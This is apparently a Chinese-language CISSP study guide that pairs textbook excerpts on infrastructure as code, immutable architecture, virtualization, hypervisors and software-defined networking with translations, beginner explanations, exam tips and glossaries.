完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 54 / PDF P597

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Monitoring and logging: Implementing comprehensive monitoring and logging to detect and respond to security incidents. This includes tracking access patterns, detecting anomalies, and logging security-relevant events. Container security: If microservices are deployed using containerization technologies (e.g., Docker), ensuring the security of containerized environments is crucial. This includes employing secure images and configurations, implementing access controls, regularly updating software components to address vulnerabilities, monitoring container activity for suspicious behavior, and utilizing tools for vulnerability scanning and compliance enforcement.

The microservices architecture, emphasizing modularization and scalability, introduces challenges and opportunities for security. Properly addressing security concerns at the level of individual microservices and the interactions between them is essential to building a resilient and secure application. Infrastructure as Code Infrastructure as code (IaC) is a change in how hardware management is perceived and handled. Instead of seeing hardware configuration as a manual, direct hands-on, one-on-one administration hassle, it is viewed as just another collection of elements to be managed like software and code are managed under DevSecOps (development, security, and operations).

With IaC, the hardware infrastructure is managed in much the same way that software code is managed, including version control, pre-deployment testing, custom-crafted test code, reasonableness checks, regression testing, and consistency in a distributed environment. This alteration in hardware management approach has allowed many organizations to streamline infrastructure changes to occur more easily, rapidly, securely, and reliably than before. IaC often uses definition files and rule sets that are machine readable to quickly deploy new settings and manage hardware consistently and efficiently.

These files can be treated as software code in terms of development, testing, deployment, updates, and management. IaC is not just limited to hardware; it can also be used to oversee and manage virtual machines (VMs), storage area networks (SANs), and software-defined networking (SDN).

中文直译 / 整理

监控与日志记录:实施全面的监控和日志记录,以检测和应对安全事件。 这包括跟踪访问模式、检测异常行为以及记录与安全相关的事件。 容器安全:如果微服务采用容器化技术(例如 Docker)部署,则确保容 器化环境的安全至关重要。 这包括使用安全的镜像和配置、实施访问控制、 定期更新软件组件以修复漏洞、监控容器活动以发现可疑行为,并使用工 具进行漏洞 扫描和合规性强制执行。 微服务架构强调模块化和可扩展性,为安全带来了挑战与机遇。 正确应对单个 微服务及其相互交互层面的安全问题,对于构建一个弹性且安全的应用程序至 关重要。 基础设施即代码 基础设施即代码(IaC)改变了人们对硬件管理的认知和处理方式。 与其将硬件 配置视为繁琐的手动、直接、一对一的管理任务,不如将其视为如同软件和代 码在 DevSecOps(开发、安全和运维)中一样需要管理的另一类元素。 通过 IaC,硬件基础设施的管理方式与软件代码的管理方式相同,包括版本控制、部 署前测试、自定义测试代码、合理性检查、回归测试以及分布式环境中的一致 性。 这种硬件管理方法的改变,使许多组织能够更轻松、快速、安全和可靠地进行 基础设施变更。

基础设施即代码(IaC)通常使用机器可读的定义文件和规则 集,以快速部署新设置并一致高效地管理硬件。 这些文件在开发、测试、部署、 更新和管理方面可被视为软件代码。 基础设施即代码不仅限于硬件; 它还可用 于监控和管理虚拟机(VM)、存储区域网络(SAN)和软件定义网络( SDN)。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

自动化测试、持续集成、持续监控是关键词。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
开发安全运营一体化 DevSecOps 把安全自动化嵌入开发和交付流程。
学习单元 55 / PDF P598

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Immutable Architecture Immutable architecture is the concept that a server never changes once it is deployed. If there is a need to update, modify, fix, or otherwise alter, a new server is built or cloned from the current one, the necessary changes are applied, and then the new server is deployed to replace the previous one. Once the new server is validated, the older server is decommissioned. VMs are destroyed and the physical hardware/system is reused for future deployments. The benefits of immutable architecture are reliability, consistency, and a predictable deployment process.

It eliminates issues common in mutable infrastructures where midstream updates and changes can cause downtime, data loss, or incompatibility. The mindset of immutable architecture is often described with the analogy of pets versus cattle or snowflakes versus phoenixes. If a server is treated like a pet, when something goes wrong, everyone marshals to the rescue. However, if a server is treated like cattle, it is removed from the herd when something goes wrong, and another is brought in to replace it.

If a server is managed uniquely, then it is a snowflake and requires specific focus and attention, causing an increase in administrative time and attention, not to mention complexity for the environment. If a server is always built from scratch, then when changes are needed, a new system can be created with integrated improvements through automated processes, thus rising from the ashes (of previously decommissioned servers) like a phoenix. This minimizes administrative overhead, reduces deployment time, and maintains consistency in the environment. Software-Defined Networking (SDN) A derivative of IaC and DCE is software-defined networking (SDN).

SDN is the management of networking as a virtual or software resource even though it technically still occurs over hardware (similar to infrastructure as code [IaC]). Just as DCE is a collection of individual systems that work together to support a resource or provide a service, so too is SDN a collection of hardware and software elements designed to virtualize networking management and control. Please see Chapter 11 for details on SDN.

中文直译 / 整理

不可变架构 不可变架构 的概念是,服务器一旦部署便永不更改。 如果需要更新、修改、 修复或以其他方式更改,将基于当前服务器构建或克隆一台新服务器,应用 必要的更改,然后部署新服务器以替换旧服务器。 一旦新服务器通过验证, 旧服务器即被退役。 虚拟机将被销毁,物理硬件/系统将被用于未来的部署。 不可变架构的优势在于可靠性、一致性以及可预测的部署流程。 它消除了可 变基础设施中常见的问题,例如中途更新和更改可能导致的停机、数据丢失 或不兼容。 不可变架构的思维方式常通过宠物与牛群,或雪花与凤凰的类比来描述。 如果 将服务器视为宠物,一旦出现问题,所有人都会赶来救援。 然而,如果将服务 器视为牛群中的一员,一旦出现问题,它就会被从群体中移除,并由另一台服 务器取代。 如果服务器是独一无二地管理的,那么它就是一朵雪花,需要特别 的关注和投入,这不仅增加了管理时间和精力,还提升了环境的复杂性。 如果 服务器总是从头开始构建,那么当需要更改时,可以通过自动化流程创建一个 包含改进的新系统,从而像凤凰一样从(已退役服务器的)灰烬中重生。 这最 小化了管理开销,缩短了部署时间,并保持了环境的一致性。

软件定义网络(SDN) IaC 和 DCE 的一种衍生是软件定义网络(SDN)。 SDN 是将网络管理为 虚拟或软件资源,尽管其技术上仍基于硬件(类似于基础设施即代码 [IaC])。 正如 DCE 是一组协同工作以支持资源或提供服务的独立系统,SDN 也是 一组旨在虚拟化网络管理和控制的硬件与软件元素。 有关 SDN 的详细信息, 请参阅 第 11 章。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

检测是 IDS,主动阻断更像 IPS。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 56 / PDF P599

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Virtualized Systems Virtualization technology is used to host one or more OSs within the memory of a single host computer or to run applications that are not compatible with the host OS. This mechanism allows virtually any OS to operate on any hardware. It also allows multiple OSs to work simultaneously on the same hardware. Organizations may implement virtualization technologies due to the huge cost savings available. For example, an organization may be able to reduce 100 physical servers to just 10 physical servers, with each physical server hosting 10 virtual servers. This reduces HVAC costs, power costs, and overall operating costs.

The hypervisor, also known as the virtual machine monitor/manager (VMM), is the component of virtualization that creates, manages, and operates the virtual machines. The computer running the hypervisor is known as the host OS, and the OSs running within a hypervisor-supported virtual machine are known as guest OSs or virtualized systems. A type I hypervisor is a native or bare-metal hypervisor (Figure 9.3, top). In this configuration, there is no host OS; instead, the hypervisor installs directly onto the hardware where the host OS would normally reside. Type 1 hypervisors are often used to support server virtualization.

This allows for maximization of the hardware resources while eliminating any risks or resource reduction caused by a host OS. A type II hypervisor is a hosted hypervisor (Figure 9.3, bottom). In this configuration, a standard regular OS is present on the hardware, and then the hypervisor is installed as another software application. Type II hypervisors are often used in relation to desktop deployments, where the guest OSs offer safe sandbox areas to test new code, allow the execution of legacy applications, support apps from alternate OSs, and provide the user with access to the capabilities of a host OS.

Cloud computing is a natural extension and evolution of virtualization, the Internet, distributed architecture, and the need for ubiquitous access to data and resources. However, it does have some potential security issues, including privacy concerns, regulation compliance difficulties, use of open versus closed source solutions, adoption of open standards, and whether or not cloud-based data is actually secured (or even securable). See Chapter 16 for details on cloud computing.

中文直译 / 整理

虚拟化系统 虚拟化技术用于在单台主机计算机的内存中托管一个或多个操作系统,或运行 与主机操作系统不兼容的应用程序。 此机制允许几乎任何操作系统在任何硬件 上运行,同时也允许多个操作系统在同一硬件上同时工作。 组织可能因为能够实现巨大的成本节约而采用虚拟化技术。 例如,一个组织可 能将100台物理服务器减少到仅10台物理服务器,每台物理服务器托管10台虚 拟服务器。 这降低了暖通空调成本、电力成本和总体运营成本。 hypervisor(也称为虚拟机监控程序/管理器(VMM))是创建、管理和操 作虚拟机的虚拟化组件。 运行hypervisor的计算机称为宿主操作系统,而 在hypervisor支持的虚拟机中运行的操作系统称为客户操作系统或虚拟化 系统。 A type I hypervisor 是一种原生或裸金属hypervisor(图9.3,顶部)。 在此 配置中,不存在宿主操作系统; 相反,hypervisor直接安装在通常应安装宿 主操作系统的硬件上。 Type 1 hypervisors通常用于支持服务器虚拟化。 这 允许最大化硬件资源,同时消除由宿主操作系统引起的任何风险或资源减少。

A II类虚拟机监控程序 是一种托管型虚拟机监控程序(图 9.3,底部)。 在此 配置中,硬件上存在一个标准的常规操作系统,然后将虚拟机监控程序作为另 一个软件应用程序进行安装。 II 类虚拟机监控程序通常用于桌面部署,其中客 户机操作系统提供安全的沙盒环境以测试新代码、运行遗留应用程序、支持来 自其他操作系统的应用程序,并为用户提供访问主机操作系统功能的能力。 云计算是虚拟化、互联网、分布式架构以及对数据和资源随时随地访问需求的 自然延伸与演进。 然而,它确实存在一些潜在的安全问题,包括隐私担忧、合 规困难、使用开源还是闭源解决方案、采用开放标准,以及云中数据是否真正 得到保护(甚至是否可保护)。 详见第 16 章了解云计算的详细信息。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 57 / PDF P600

第 600 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Virtualization has several benefits, such as launching individual instances of virtual servers or services as needed, real-time scalability, and running the exact OS version needed for a specific application. Virtualized servers and services are indistinguishable from traditional servers and services from a user's perspective. Recovery from damaged, crashed, or corrupted virtual systems is often quick, simply consisting of replacing the virtual system's main hard drive file with a clean backup version and then relaunching it.

Virtualization can also provide a reasonably secure means to continue to operate end of life (EOL) and end of service life (EOSL)/end of support (EOS) OSs to support legacy business applications.

中文直译 / 整理

虚拟化具有多项优势,例如按需启动单个虚拟服务器或服务、实时可扩展 性,以及运行特定应用程序所需的精确操作系统版本。 从用户的角度来看,虚 拟化的服务器和服务与传统服务器和服务无法区分。 对于受损、崩溃或损坏的 虚拟系统,恢复通常很快,只需用干净的备份版本替换虚拟系统的主硬盘文件, 然后重新启动即可。 虚拟化还能提供一种相对安全的方式,以继续运行生命周 期结束(EOL)和服务生命周期结束(EOSL)/支持结束(EOS)的操作系统, 以支持遗留业务应用程序。

小白解释

场景先行:你是公司的安全负责人,正在读第 600 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 600 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 58 / PDF P601

第 601 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

中文直译 / 整理

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

小白解释

场景先行:你是公司的安全负责人,正在读第 601 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 601 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 59 / PDF P602

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 9.3 Types of hypervisors Elasticity refers to the flexibility of virtualization and cloud solutions (see Chapter 16) to expand or contract resource utilization based on need. In relation to virtualization, host elasticity means additional hardware hosts can be booted when needed and then used to distribute the workload of the virtualized services over the newly available capacity. As the workload becomes smaller, you can pull virtualized services off unneeded hardware so that it can be shut down to conserve electricity and reduce heat.

Elasticity can also refer to the ability of a VM/guest OS to take advantage of any unused hardware resources on the fly as needed, but then release those resources when they are not needed. For example, a hardware host supporting five VMbased guest OSs may have over 30 percent CPU computational capacity unused. If a process-intensive application is launched within one of the VMs, the additional hardware host CPU capacity could be consumed; then once the application completes its intensive work task, the resource would be released.

Elasticity has been a common capability of classic stand-alone systems for decades, but now with virtualization, the use of resources is shared among more than just a few processes—it can span across multiple VMs on the same hardware host as well as potentially across numerous hardware hosts. It is also important to understand scalability in relation to elasticity. These terms are similar, but they are describing different concepts. Elasticity is the expansion or contraction of resources to meet current processing needs (especially in cloud computing), whereas scalability is the ability to take on more work or tasks.

Usually, scalability is both a software and hardware characteristic that can handle more tasks or workloads, whereas elasticity is a hardware (physical or virtual) or platform characteristic where resources are optimized to meet the demands of current tasks. Usually, scalability is considered a long-term characteristic, while elasticity is more short-term. An elastic system can adjust resource consumption based on current processing needs, whereas a scalable system can be expanded to handle more processing over time. Thus, a scalable system must also be elastic, but an elastic system does not need to be scalable. In relation to security, virtualization offers several benefits.

It is often easier and faster to make backups of entire virtual systems than the equivalent native hardware-installed system. Snapshots (aka checkpoints) are backups of virtual machines. Plus, when there is an error or problem, the virtual system can be replaced by a snapshot backup in minutes. Malicious code compromise or infection of virtual systems rarely affects the host OS due to

中文直译 / 整理

图 9.3 虚拟化程序的类型 弹性 指虚拟化和云解决方案(参见第 16 章)根据需求扩展或收缩资源利用率 的灵活性。 在虚拟化方面,主机弹性意味着在需要时可以启动额外的硬件主机, 并利用其新可用的容量来分担负载。 当负载减少时,您可以将虚拟化服务从不 必要的硬件上移除,以便关闭这些硬件以节省电力并减少热量。 弹性还可以指 虚拟机/客户操作系统能够动态利用任何未使用的硬件资源,然后在不再需要时 释放这些资源。 例如,一台支持五个基于虚拟机的客户操作系统的硬件主机可 能有超过 30% 的 CPU 计算能力处于空闲状态。 如果在其中一个虚拟机中启动 了计算密集型应用程序,额外的硬件主机 CPU 容量可能会被占用; 一旦应用程 序完成其密集型任务,资源就会被释放。 弹性长期以来一直是经典独立系统的 常见功能,但如今借助虚拟化,资源的使用不仅限于少数几个进程——它可以 在同一硬件主机上的多个虚拟机之间共享,甚至可能跨越多个硬件主机。 理解可扩展性与弹性之间的关系也很重要。 这两个术语相似,但描述的是不同 的概念。 弹性是指根据当前处理需求扩展或收缩资源(尤其在云计算中),而 可扩展性则是指处理更多工作或任务的能力。

通常,可扩展性是软件和硬件共 同具备的特性,能够处理更多的任务或工作负载; 而弹性则是硬件(物理或虚 拟)或平台的特性,通过优化资源以满足当前任务的需求。 通常,可扩展性被 视为长期特性,而弹性则更偏向短期。 一个弹性系统可以根据当前的处理需求 调整资源消耗,而一个可扩展系统则可以扩展以在一段时间内处理更多的处理 任务。 因此,一个可扩展系统必须也是弹性的,但一个弹性系统并不一定需要 是可扩展的。 在安全性方面,虚拟化提供了多种优势。 通常,备份整个虚拟系统比备份等效 的原生硬件安装系统更容易、更快。 快照(又称检查点)是虚拟机的备份。 此 外,当出现错误或问题时,虚拟系统可以在几分钟内通过快照备份进行替换。 由于

小白解释

场景先行:你是公司的安全负责人,正在读第 602 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 60 / PDF P603

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

the hypervisor's VM-to-VM and VM-to-host isolation. This allows for safe testing and experimentation. Virtualization is used for a wide variety of new architectures and system design solutions. Locally (or at least within an organization's private infrastructure), virtualization can be used to host servers, client OSs, limited user interfaces (i.e., virtual desktops), applications, and more. Virtual Software A virtual application or virtual software is a software product deployed in such a way that it is fooled into believing it is interacting with a full host OS.

A virtual (or virtualized) application has been packaged or encapsulated so that it can execute but operate without full access to the host OS. A virtual application is isolated from the host OS so that it cannot make any direct or permanent changes to the host OS. Any changes, such as file writes, configuration file or registry modifications, or system setting alterations, are intercepted by the isolation manager and recorded (typically into a single file). This allows the contained software to perceive it has interaction with the OS, without that interaction actually taking place.

Thus, the virtualized application executes just like any regularly installed application, but it is only interacting and changing with a virtual representation of the OS, not the actual OS (aka sandboxing). In many cases, operating an application in a software virtualization tool can effectively transform an installed application into a portable application. This means the application's encapsulation and file can be moved to another OS (with the same software virtualization product), where it can execute.

It may also be possible to place the application's encapsulation onto removable media and be able to execute the software from a portable storage device plugged into another computer system. Some software virtualization solutions enable applications from one OS to be operated on another. For example, Wine allows some Windows software products to be executed on Linux. The concept of software virtualization has evolved into its own virtualization derivative concept known as containerization, which is covered in a later section, “Containerization.” Virtualized Networking hypervisor

中文直译 / 整理

的VM与VM之间以及VM与主机之间的隔离,恶意代码对虚拟系统 的破坏或感染很少会影响主机操作系统。 这使得安全测试和实验成为可能。 虚拟化被用于各种新型架构和系统设计解决方案。 在本地(或至少在组织的私 有基础设施内),虚拟化可用于托管服务器、客户端操作系统、有限的用户界 面(即虚拟桌面)、应用程序等。 虚拟软件 虚拟应用程序或虚拟软件是一种以这种方式部署的软件产品,使其误以为自己 正在与完整的主机操作系统交互。 虚拟(或已虚拟化)应用程序已被打包或封 装,以便能够执行,但无需完全访问主机操作系统。 虚拟应用程序与主机操作 系统隔离,因此无法对主机操作系统进行任何直接或永久性更改。 任何更改, 例如文件写入、配置文件或注册表修改、系统设置更改,都会被隔离管理器拦 截并记录(通常记录到单个文件中)。 这使得包含的软件能够感知其与操作系 统的交互,而实际上并未发生这种交互。 因此,虚拟化应用程序的执行方式与 常规安装的应用程序完全相同,但它仅与操作系统的虚拟表示进行交互和更改, 而非实际的操作系统(即沙箱化)。 在许多情况下,在软件虚拟化工具中运行应用程序可以有效地将已安装的应用 程序转换为便携式应用程序。

这意味着应用程序的封装文件可以移动到另一个 操作系统(使用相同的软件虚拟化产品),并在其中执行。 此外,还可以将应 用程序的封装放置到可移动介质上,并通过插入另一台计算机系统的便携式存 储设备来运行该软件。 一些软件虚拟化解决方案允许在另一个操作系统上运行来自一个操作系统的应 用程序。 例如,Wine 允许在 Linux 上运行某些 Windows 软件产品。 软件虚拟化的概念已演变为一种称为容器化的独立虚拟化衍生概念,该概念将 在后面的章节“容器化”中介绍。 虚拟化网络

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 61 / PDF P604

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The concept of OS virtualization has given rise to other virtualization topics, such as virtualized networks. A virtualized network or network virtualization is the combination of hardware and software networking components into a single integrated entity. The resulting solution allows for software control over all network functions: management, traffic shaping, address assignment, and so on. A single management console or interface can be used to oversee every aspect of the virtual network, a task that required physical presence at each hardware component in the past. Virtualized networks have become a popular means of infrastructure deployment and management by corporations worldwide.

They allow organizations to implement or adapt other interesting network solutions, including SDNs, virtual SANs, guest OSs, and port isolation. Custom virtual network segmentation can be used in relation to virtual machines to make guest OSs members of the same network division as that of the host, or guest OSs can be placed into alternate network divisions. A virtual machine can be made a member of a different network segment from that of the host or placed into a network that only exists virtually and does not relate to the physical network media (effectively an SDN; see Chapter 11). Software-Defined Everything Virtualization extends beyond just servers and networking.

Software-defined everything (SDx) refers to a trend of replacing hardware with software using virtualization. SDx includes virtualization, virtualized software, virtual networking, containerization, serverless architecture (Chapter 16), XaaS (Chapter 16), infrastructure as code (IaC), SDN (Chapter 11), virtual storage area network (VSAN) (Chapter 11), software-defined storage (SDS) (Chapter 11), VDI, VMI, SDV, and software-defined data center (SDDC). The SDx examples that are not defined elsewhere (either in this chapter or in Chapter 11) are discussed here.

